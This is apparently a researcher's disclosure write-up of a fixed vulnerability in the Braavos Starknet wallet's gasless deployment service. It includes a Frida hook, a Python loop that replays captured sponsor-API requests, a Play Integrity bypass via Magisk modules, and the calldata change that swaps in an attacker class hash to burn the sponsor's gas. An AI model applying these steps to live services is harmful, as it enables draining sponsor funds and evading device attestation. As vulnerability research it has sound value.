I’ve always been fascinated by ZK-related technology, which led me to explore ZK-based chains like Starknet. I found its Account Abstraction (AA) model and wallet architecture particularly interesting. One consequence of Starknet’s AA model is that every account is itself a smart contract: before a user can transact on-chain, their account contract must first be deployed.

This is somewhat counter-intuitive. To deploy a new account, you seemingly need an existing account with gas (previously ETH, now STRK) to fund this yet-to-be-created account. Tracing this back, it feels like a classic “chicken-and-egg” problem. For new users, this means they have to acquire STRK from an external source, perhaps a bridge, and send it to their new address just to complete the deployment. This adds a significant layer of friction to the onboarding process.

To smooth over this frustrating onboarding hurdle, Braavos, one of the mainstream Starknet wallets, came up with a clever answer: a built-in “Gasless” feature. The moment you finish creating a wallet in their mobile app—right after backing up your seed phrase—the app automatically deploys your account on-chain for you, covering the gas fee itself.

This magical, sponsored deployment process immediately caught my attention. Unlike the more formal Paymaster concept, this feature felt more like a pure “Gas Funder.” My security intuition immediately flagged two potential areas worth digging into:

  1. Is there any rate-limiting? If not, could I write a script to trigger this feature repeatedly, creating a massive number of accounts and draining their gas pool?
  2. How do they validate the transaction I submit? The Braavos backend uses its own funds to execute a transaction with parameters I provide. If their validation wasn’t strict, could I submit any transaction—say, a token transfer—and have them unknowingly sign and execute it, effectively siphoning funds from their sponsor account?

Bypassing the Play Integrity API

My first step was to intercept the network traffic to understand the mechanics of this sponsored transaction. But I hit a wall almost immediately.

I discovered that on an Android device, if you set up an environment capable of intercepting traffic—for instance, rooting the device with Magisk and using Frida to strip SSL pinning—the Braavos app would refuse to send the account deployment request. On the same phone in a “clean,” non-interceptable environment, it worked perfectly.

At first, I assumed the app had its own root detection. I tried to find related code snippets, but reversing its React Native codebase proved to be a hassle. I found a few suspicious-looking areas, but nothing definitive. After a process of elimination, I discovered the trigger was more fundamental: the app wouldn’t send the request if the phone’s bootloader was unlocked. Even simply enabling the “Allow OEM Unlock” option in the developer settings was enough to block it.

This didn’t feel like a typical in-app root check. It had to be a more systematic, robust verification. I asked GPT to brainstorm some possible detection mechanisms, and after manually hooking a few, I got a hit on com.google.android.play.core.integrity. That’s when I realized the root cause was something I had heard of but never battled directly: the Play Integrity API.
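For the curious, below is a minimal sketch of the kind of Frida hook that produced the hit. It targets IntegrityManagerFactory.create(Context), the documented Play Core entry point; the process name passed to attach() is a placeholder, not necessarily the app’s real one.

# pip install frida frida-tools
import sys
import frida

# JS payload: log whenever the app asks Play Core for an IntegrityManager.
# Class and method names are taken from the public Play Integrity docs.
JS_HOOK = """
Java.perform(function () {
  var Factory = Java.use('com.google.android.play.core.integrity.IntegrityManagerFactory');
  Factory.create.overload('android.content.Context').implementation = function (ctx) {
    console.log('[*] IntegrityManagerFactory.create() called');
    return this.create(ctx);
  };
});
"""

device = frida.get_usb_device()
session = device.attach("Braavos")  # placeholder process name; adjust to the real one
script = session.create_script(JS_HOOK)
script.on("message", lambda msg, data: print(msg))
script.load()
sys.stdin.read()  # keep the hook alive while you exercise the app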

Simply put, this is an official Google service that lets an app determine whether the device environment is “secure.” When called, the API collects device-environment signals, has them attested by Google’s servers, and returns a signed verdict token that a backend can verify. It suddenly reminded me of how Magisk’s creator, John Wu, used to complain on Twitter about SafetyNet (the predecessor to Play Integrity). A small update from Google could render months of bypass efforts obsolete—a constant cat-and-mouse game. Nevertheless, the XDA community always seems to find a way.

Since the Play Integrity API was the blocker, my primary objective shifted: How can I, in a rooted environment, fool the Play Integrity API’s checks?

Of course, if we had EL3-level privileges on our test device, bypassing this would be trivial—a classic dimensional strike, modifying user space from a higher privilege level without touching anything at EL1 or below. But that would require rewriting a lot of components, so I stuck to finding a more universal solution.

This is a persistent pain for Android root enthusiasts, so bypass methods are constantly evolving. Currently, on a test device downgraded to Android 12, a combination of two Magisk modules can successfully bypass Play Integrity:

  • Play Integrity Fix (PIF): This module spoofs the device’s properties. When the API checks the device status (like the bootloader lock), PIF intercepts the call and returns the profile of a “clean” device.
  • TrickyStore: A critical part of the check involves signing data with a private key in the hardware-backed Keystore. This module intercepts the keystore attestation path, substituting a certificate chain that satisfies the validation.

After tinkering with these two modules, I successfully captured the key request sent by the Braavos wallet.

The Controllable class_hash

With the traffic captured, the full request came into view. The deployment happens in two stages: first a call to a /simulate endpoint, followed by a call to /execute to finalize it on-chain.

POST /prod/gasless/tx/simulate HTTP/2
Host: geqr5qrwjh.execute-api.us-east-1.amazonaws.com
X-Firebase-Appcheck: <REDACTED_EXAMPLE_TOKEN>
Content-Type: text/plain;charset=UTF-8
...

{
    "network": "mainnet-alpha",
    "calls": [
        {
            "contractAddress": "0x03d94f65ebc7552eb517ddb374250a9525b605f25f4e41ded6e7d7381ff1c2e8",
            "entrypoint": "deploy_braavos_account",
            "calldata": [
                "0x4ee6df0656972b4e096902b735f02f706a7c2142f9547b2b81a39074d23ce41",
                "13",
                "0x03957f9f5a1cbfe918cedc2015c85200ca51a5f7506ecb6de98a5207b759bf8a", // account_class_hash
                "0x0", "0", "0", "0", "0", "0x0", "0x0", "0x0", "0x0",
                "0x534e5f4d41494e",
                "3233904491969167010184796238085025547722936772405769931232663921476088886149",
                "2165938814148688931756724393060713462260373918073253056937201152616284205373"
            ]
        }
    ],
    "account": "0x2e3e9a4a70bca7a997cb65fe30d9c04f49d6d69d3067d69516f9e98f9261ad1",
    "walletVersion": "4.9.2",
    "deviceType": "mobile"
}

The X-Firebase-Appcheck token in the header, obtained via the Play Integrity API, was valid for about an hour. During this window, I could call the simulate and execute endpoints freely. This meant my first hypothesis about rate-limiting was essentially correct.
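As a sketch of how one can probe that window, the captured request can simply be replayed from a script. The body below is the JSON shown above, saved to a local file, and the token is lifted from the intercepted traffic; the /execute call follows the same pattern.

# pip install requests
import json
import requests

BASE = "https://geqr5qrwjh.execute-api.us-east-1.amazonaws.com/prod/gasless/tx"
APPCHECK_TOKEN = "<token captured from the device>"  # valid for roughly an hour

with open("captured_simulate_body.json") as f:  # the request body shown above
    body = json.load(f)

headers = {
    "X-Firebase-Appcheck": APPCHECK_TOKEN,
    "Content-Type": "text/plain;charset=UTF-8",
}

# Replay /simulate repeatedly; within the token's lifetime, nothing pushed back.
for i in range(10):
    resp = requests.post(f"{BASE}/simulate", headers=headers, data=json.dumps(body))
    print(i, resp.status_code, resp.text[:100])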

I tried modifying the contractAddress and entrypoint fields of the call, but the backend validated them. This disproved my second hypothesis—I couldn’t make it execute an arbitrary transfer.

However, as I continued inspecting the calldata, I noticed that one parameter I’ve commented as account_class_hash seemed to have no backend validation. I could change it to any value I wanted.

So, what is a class_hash? Simply put, on Starknet you first declare a class (the code), and contracts are then deployed as instances of that class. This class_hash defines the underlying code logic for the AA contract you are about to deploy. The correct value, of course, should be the class_hash of the official Braavos account.

Under normal circumstances, being able to change the class_hash for your own account is a feature of AA, allowing for different types of account implementations. But now, someone else (Braavos) was paying for the deployment, and I could control the class_hash. This is where the problem lay.
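Concretely, the only change an attacker needs to make is to a single element of the calldata array, as sketched below, continuing from the replay script. The attacker class hash is a hypothetical placeholder; it would point at a contract class the attacker had already declared on Starknet.

# Class hash of a contract class the attacker has already declared on-chain.
ATTACKER_CLASS_HASH = "0x0123..."  # hypothetical placeholder

# calldata[2] is the field commented as account_class_hash in the capture above.
body["calls"][0]["calldata"][2] = ATTACKER_CLASS_HASH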

By analyzing the source code of Braavos’s account factory and base account contracts, I saw the call chain was deploy_braavos_account -> initializer_from_factory.

Inside the base account’s initialization logic, the code does the following:

// Read account_chash directly from the input parameters
let account_chash = (*deployment_params.at(0)).try_into().unwrap();
// Replace the current contract's implementation with this class_hash
replace_class_syscall(account_chash).unwrap_syscall();

// Then, call the initializer function of the new class_hash
let mut depl_cdata = array![stark_pub_key.pub_key];
depl_cdata.append_span(deployment_params);
library_call_syscall(
    class_hash: account_chash,
    function_selector: Consts::INITIALIZER_FROM_FACTORY_SELECTOR,
    calldata: depl_cdata.span(),
).unwrap_syscall();

The account_chash is taken directly from deployment_params, which is the array we pass in via calldata! Because the Braavos backend didn’t validate this value, an attacker could provide the class_hash of their own malicious code.

The library_call_syscall is similar to the EVM’s delegatecall, and the initializer_from_factory function of this attacker-provided class_hash could contain any logic. When the Braavos backend received this manipulated request, it would instruct its sponsor account to submit the transaction. The result: the sponsor account would pay the gas fee to execute arbitrary code that I wrote.
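For the attacker’s class to be reachable at all, it just has to expose a function matching that selector. As a small sanity check while reading the factory code, the selector constant can be reproduced off-chain; a sketch with starknet.py:

# pip install starknet-py
from starknet_py.hash.selector import get_selector_from_name

# Starknet entrypoint selectors are the starknet_keccak of the function name,
# so this value should match Consts::INITIALIZER_FROM_FACTORY_SELECTOR.
print(hex(get_selector_from_name("initializer_from_factory")))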

Of course, by this point in the execution, the caller context had shifted to the factory contract, so I couldn’t use this identity to transfer funds from the sponsor account. Therefore, the vulnerability ultimately manifested as a “Gas Burning” attack—the ability to execute arbitrary code, with the most direct harm being the depletion of the sponsor’s gas funds.

Impact Analysis: The Sponsor Pool

So, how much gas was there for me to burn? I went on-chain to investigate.

I found that Braavos used at least three concurrent sponsor accounts to process these requests (I’m guessing their backend runs at least three parallel workers for this):

  • 0x05e8fc9916168dca043f825b4024170826e529c56a81b9c7bdc7a6272c1d7a44
  • 0x07be43131dccfdd41ea1b06f3e13026e827653932de281675daea6c6f905b5bd
  • 0x0761a5d53b8133d70140845fbc522f63adf80f3b9ed979d2eb7f772f76c1b206

The STRK balance in these accounts was kept relatively low, typically under 1,000 STRK each.
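For reference, watching those balances is straightforward from a script; below is a sketch using starknet.py, where the RPC URL is a placeholder and the token address is the canonical mainnet STRK contract.

# pip install starknet-py
import asyncio
from starknet_py.hash.selector import get_selector_from_name
from starknet_py.net.client_models import Call
from starknet_py.net.full_node_client import FullNodeClient

STRK_TOKEN = 0x04718f5a0fc34cc1af16a1cdee98ffb20c31f5cd61d6ab07201858f4287c938d
SPONSORS = [
    0x05e8fc9916168dca043f825b4024170826e529c56a81b9c7bdc7a6272c1d7a44,
    0x07be43131dccfdd41ea1b06f3e13026e827653932de281675daea6c6f905b5bd,
    0x0761a5d53b8133d70140845fbc522f63adf80f3b9ed979d2eb7f772f76c1b206,
]

client = FullNodeClient(node_url="https://your-mainnet-rpc")  # placeholder

async def main():
    for acct in SPONSORS:
        call = Call(
            to_addr=STRK_TOKEN,
            selector=get_selector_from_name("balanceOf"),  # some tokens expose balance_of
            calldata=[acct],
        )
        low, high = await client.call_contract(call)  # Uint256 returned as two felts
        print(hex(acct), (low + (high << 128)) / 10**18, "STRK")

asyncio.run(main())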

But the real prize lay behind them. These three accounts were topped up on-demand by a single, central “replenishment account”:

  • 0x040e32e176dca8f7fba4fab267763172d4530add0719b62ad77d96a2903030ad

This main account held approximately $51,000 USD worth of various tokens (ETH, USDC, etc.). It would periodically swap these assets into STRK to “pay” the three frontline accounts.

With this information, the full potential impact became clear:

  1. By crafting transactions with high computational costs, an attacker could rapidly drain all the STRK from the three sponsor accounts.
  2. Due to the replenishment mechanism, the attack could run 24/7. As long as the main treasury had funds, it would become a perpetual money drain, slowly siphoning off the entire $51k pool.
  3. Once the gas was depleted, the Gasless mechanism would fail for all legitimate new users, paralyzing the Braavos onboarding process.

Epilogue: The Severity Rating

I immediately submitted this vulnerability report to Braavos through their bug bounty program (https://braavos.app/braavos-wallet-bug-bounty-program/). They promptly confirmed and fixed the issue. However, a difference of opinion arose when it came to the severity rating.

In my assessment, a vulnerability that can cause direct, persistent financial loss and lead to the failure of a core platform feature (new user onboarding) should be classified as High severity.

But the Braavos team ultimately rated it as Low. Their reasoning was that it did not affect user funds, only an “optional UX feature” belonging to Braavos itself. They also noted that the sponsor accounts were intentionally kept at a low balance, making the financial loss manageable.

I don’t entirely agree with this assessment. An attacker exploiting this could be very stealthy. From the Braavos team’s perspective, they might at most notice an unusually high gas consumption rate, leading them to passively keep refilling the pool while the losses mounted. While I couldn’t transfer their funds directly, I could use their gas to perform my own computationally intensive tasks or for other on-chain arbitrage opportunities. Is that not a direct financial loss?

Perhaps because “Gas Burning” vulnerabilities are less common, there are fewer community precedents for rating them. When it comes to defining their severity, it seems it’s always the submitter who’s in the awkward position.